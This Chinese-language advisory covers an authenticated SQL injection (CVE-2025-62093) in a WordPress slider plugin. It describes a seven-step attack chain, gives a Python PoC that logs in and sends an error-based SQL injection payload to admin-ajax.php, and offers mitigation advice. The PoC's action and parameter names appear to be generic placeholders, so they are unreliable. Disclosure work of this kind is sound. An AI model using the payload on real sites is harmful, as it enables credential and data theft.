CVE-2025-62093 WordPress lbg_fullscreen_fullwidth

漏洞信息

漏洞编号

CVE-2025-62093

漏洞类型

SQL注入

CVSS评分

8.5 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

WordPress lbg_fullscreen_fullwidth_slider插件

漏洞概述

CVE-2025-62093是WordPress插件Image&Video FullScreen Background（lbg_fullscreen_fullwidth_slider）中的一个高危SQL注入漏洞。该漏洞由PatchStack安全团队的审计人员发现，CVSS评分达到8.5分，属于高危级别。漏洞根源在于插件对用户输入的特殊元素没有进行充分的转义或过滤，导致攻击者可以在SQL查询中注入恶意代码。这是一个经过身份验证的SQL注入漏洞，攻击者需要拥有低权限的WordPress账户（如订阅者或贡献者角色）即可发起攻击。成功利用此漏洞，攻击者可以在无需任何用户交互的情况下，从目标数据库中提取敏感信息，包括用户凭证、站点配置数据、其他插件和主题的数据库表内容等。该漏洞影响了从任意版本到1.6.7的所有插件版本，WordPress站点管理员应尽快采取修复措施。

技术细节

该SQL注入漏洞存在于lbg_fullscreen_fullwidth_slider插件的参数处理逻辑中。攻击者通过构造特定格式的HTTP请求参数，将恶意的SQL代码注入到数据库查询语句中。由于插件在处理用户输入时未使用适当的参数化查询或输入过滤机制，攻击者可以突破原有的查询逻辑，执行任意SQL命令。攻击者可以利用UNION SELECT等技术从数据库中提取信息，如wp_users表中的用户名和密码哈希值。攻击向量的网络可达性（AV:N）和低权限要求（PR:L）使得漏洞利用门槛相对较低。攻击者获取的数据库信息可用于进一步横向移动或提权攻击，威胁整个WordPress站点的安全。

攻击链分析

STEP 1

步骤1

攻击者注册或获取目标WordPress站点的低权限账户（如订阅者角色）

STEP 2

步骤2

攻击者识别目标站点是否安装并启用了存在漏洞的lbg_fullscreen_fullwidth_slider插件（版本<=1.6.7）

STEP 3

步骤3

攻击者使用低权限账户登录WordPress后台，获取有效的会话cookie

STEP 4

步骤4

攻击者构造包含SQL注入payload的HTTP请求，针对插件的AJAX处理端点发送恶意请求

STEP 5

步骤5

漏洞参数未经过滤直接拼接入SQL查询语句，攻击payload在数据库中执行

STEP 6

步骤6

攻击者通过UNION注入或布尔盲注等技术，从数据库中提取敏感信息（如用户表数据）

STEP 7

步骤7

获取的管理员凭据可用于进一步入侵，包括获取服务器shell权限或完全控制网站

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-62093 SQL Injection PoC
# Target: WordPress lbg_fullscreen_fullwidth_slider plugin <= 1.6.7
# Type: Authenticated SQL Injection

TARGET_URL = "http://target-wordpress-site.com/"
USERNAME = "attacker_account"
PASSWORD = "attacker_password"

def get_wordpress_session():
    """Login to WordPress and get session cookie"""
    login_url = TARGET_URL + "wp-login.php"
    session = requests.Session()
    
    login_data = {
        'log': USERNAME,
        'pwd': PASSWORD,
        'wp-submit': 'Log In',
        'redirect_to': TARGET_URL + 'wp-admin/',
        'testcookie': '1'
    }
    
    response = session.post(login_url, data=login_data, allow_redirects=True)
    
    if 'wordpress_logged_in' in str(session.cookies):
        return session
    return None

def exploit_sql_injection(session):
    """Send malicious SQL injection payload"""
    # Vulnerable endpoint - plugin's AJAX handler
    vuln_url = TARGET_URL + "wp-admin/admin-ajax.php"
    
    # SQL Injection payload - extract database version
    payload = {
        'action': 'lbg_ajax_action',
        'lbg_param': "1' AND (SELECT 7745 FROM(SELECT COUNT(*),CONCAT(0x7171787071,(SELECT MID((IFNULL(CAST(database() AS CHAR),0x20)),1,50)),0x7178786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- -",
        'slider_id': '1'
    }
    
    response = session.post(vuln_url, data=payload)
    print(f"Response Status: {response.status_code}")
    print(f"Response Content: {response.text[:500]}")
    
    return response

def main():
    print("[*] CVE-2025-62093 SQL Injection PoC")
    print("[*] Target: lbg_fullscreen_fullwidth_slider <= 1.6.7")
    
    session = get_wordpress_session()
    if not session:
        print("[!] Failed to obtain WordPress session")
        sys.exit(1)
    
    print("[+] Successfully authenticated")
    exploit_sql_injection(session)

if __name__ == "__main__":
    main()

影响范围

lbg_fullscreen_fullwidth_slider <= 1.6.7

防御指南

临时缓解措施

在官方补丁发布之前，建议立即禁用受影响的lbg_fullscreen_fullwidth_slider插件，或使用其他安全性更高的替代插件。同时，应限制WordPress用户的注册权限，避免随意分配作者或订阅者角色。对于必须使用的场景，应启用双因素认证并监控异常登录行为。建议使用WAF产品（如Cloudflare、Barracuda等）添加一层防护，过滤恶意的SQL注入请求特征。

CVE-2025-62093 WordPress lbg_fullscreen_fullwidth_slider插件SQL注入漏洞